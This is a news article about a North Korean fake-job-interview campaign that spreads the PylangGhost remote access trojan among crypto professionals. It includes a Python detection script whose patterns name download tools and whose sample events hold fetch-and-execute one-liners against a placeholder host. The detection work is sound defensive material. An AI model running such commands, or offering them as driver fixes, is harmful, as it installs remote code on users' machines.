
tl;dr
North Korean hackers linked to the group Famous Chollima are targeting cryptocurrency professionals, especially in India, with fake job interviews to steal data and deploy malware called PylangGhost. This Python-based remote access trojan steals credentials from over 80 browser extensions, including...
North Korean hackers affiliated with the Famous Chollima group have intensified a sophisticated campaign targeting cryptocurrency professionals, particularly in India. They employ elaborate fake job interviews to steal sensitive data and deploy a new Python-based remote access trojan (RAT) called PylangGhost. This malware stealthily extracts credentials from over 80 browser extensions, including widely used crypto wallets and password managers.
The operation begins with attackers impersonating reputable companies such as Coinbase, Robinhood, and Uniswap via fraudulent job websites. Victims are funneled through skill tests and video interviews, during which they are tricked into running malicious commands presented as a video driver installation needed to fix their camera. Running that command installs the RAT, giving the attackers persistent access to the victim's system and the ability to execute remote commands and harvest data. A candidate asked to paste a command into a terminal to make a camera or microphone work should treat the request itself as the attack, not as a troubleshooting step.
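The lure above relies on the victim typing a fetch-and-execute one-liner into their own shell, which means it shows up in endpoint telemetry as an ordinary process-creation event. The following detection heuristic is an added example, not code from the original article or from any vendor's report on the campaign: it scans constructed JSON-lines process events for the general shape of such a command (remote download, archive extraction, temp directory, interpreter launch, driver/camera wording). The patterns and sample events are assumptions about that general shape; the page does not reproduce the actual commands used, and nothing here is a campaign IOC.

```python
import json
import re
from dataclasses import dataclass, field

# Heuristics for the lure shape described in the text: a pasted one-liner that
# fetches something remote and hands it to an interpreter, dressed up as a
# camera/driver fix. These patterns are an assumption about the general shape
# of such commands, not indicators taken from the campaign itself.
SIGNALS = {
    "remote_fetch": re.compile(
        r"\b(curl|wget|Invoke-WebRequest|iwr|Start-BitsTransfer|certutil|bitsadmin)\b", re.I),
    "interpreter_launch": re.compile(
        r"\b(python3?|pythonw|py|node|powershell|pwsh|bash|sh|zsh)\b", re.I),
    "archive_extract": re.compile(r"\b(tar|unzip|Expand-Archive|7z)\b", re.I),
    "temp_dir": re.compile(r"(%TEMP%|\$env:TEMP|/tmp/|AppData\\Local\\Temp)", re.I),
    "driver_lure": re.compile(r"\b(driver|camera|webcam|codec)\b", re.I),
}


@dataclass
class Finding:
    cmdline: str
    user: str
    reasons: list[str] = field(default_factory=list)


def score_command(cmdline: str) -> list[str]:
    """Return the names of the signals present in a command line (dict order)."""
    return [name for name, rx in SIGNALS.items() if rx.search(cmdline)]


def is_suspicious(reasons: list[str]) -> bool:
    # Require the download step plus at least one execution-ish signal; a bare
    # download (curl in a build script, say) is not enough on its own.
    return "remote_fetch" in reasons and any(
        r in reasons for r in ("interpreter_launch", "archive_extract", "temp_dir"))


def scan(log_lines: list[str]) -> list[Finding]:
    """Scan JSON-lines process-creation events and return the suspicious ones."""
    findings = []
    for raw in log_lines:
        ev = json.loads(raw)
        reasons = score_command(ev.get("cmdline", ""))
        if is_suspicious(reasons):
            findings.append(Finding(ev["cmdline"], ev.get("user", "?"), reasons))
    return findings


# Constructed sample telemetry for illustration; not real data from the campaign.
SAMPLE_EVENTS = [
    json.dumps({"user": "alice", "parent": "explorer.exe",
                "cmdline": "powershell.exe -Command Get-Process"}),
    json.dumps({"user": "alice", "parent": "cmd.exe",
                "cmdline": r"curl -s https://example.invalid/video-driver.zip -o %TEMP%\vd.zip"
                           r" && tar -xf %TEMP%\vd.zip -C %TEMP% && python %TEMP%\vd\fix-camera.py"}),
    json.dumps({"user": "bob", "parent": "bash",
                "cmdline": "pip install requests"}),
    json.dumps({"user": "bob", "parent": "bash",
                "cmdline": 'bash -c "$(curl -fsSL https://example.invalid/driver-update.sh)"'}),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.user}] {', '.join(f.reasons)}: {f.cmdline}")
```

In practice this would run over EDR or Sysmon process-creation events rather than the inline list, and the `driver_lure` signal is deliberately not required for a hit: the words in the lure change, the fetch-then-execute shape does not.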
Experts emphasize the urgent need for India to enforce mandatory cybersecurity audits for blockchain firms and heighten awareness about these schemes. Calls for stronger legal frameworks and international cooperation also grow louder as such cybercrimes cross borders. The Ministry of Electronics and IT (MEITY), CERT-In, and national cyber agencies must collaborate globally to curb these sophisticated threats.
This campaign is part of North Korea's broader crypto-focused cybercrime strategy, which includes high-profile attacks by groups like Lazarus. Since 2023, North Korean operators have used fake companies and job portals across multiple platforms to recruit and compromise individuals. PylangGhost targets Windows users; a comparable variant named GolangGhost targets macOS, while Linux systems are not targeted.
In 2024 alone, North Korean-backed groups have stolen at least $659 million in cryptocurrencies, executing elaborate hacks such as the $50 million Radiant Capital breach initiated through malware-laden PDFs. A notable prevention success was achieved by crypto exchange Kraken, which foiled a hacking attempt by detecting and exposing a North Korean operative during an IT job application process.
The rising trend of hiring-based cyberattacks highlights the evolving nature of threats in the crypto industry. Stakeholders must remain vigilant, emphasizing cybersecurity hygiene and international legal action to protect digital assets and the professionals behind them. Have you encountered suspicious job offers in the crypto space? What measures do you think firms should prioritize to defend against such covert cyber threats?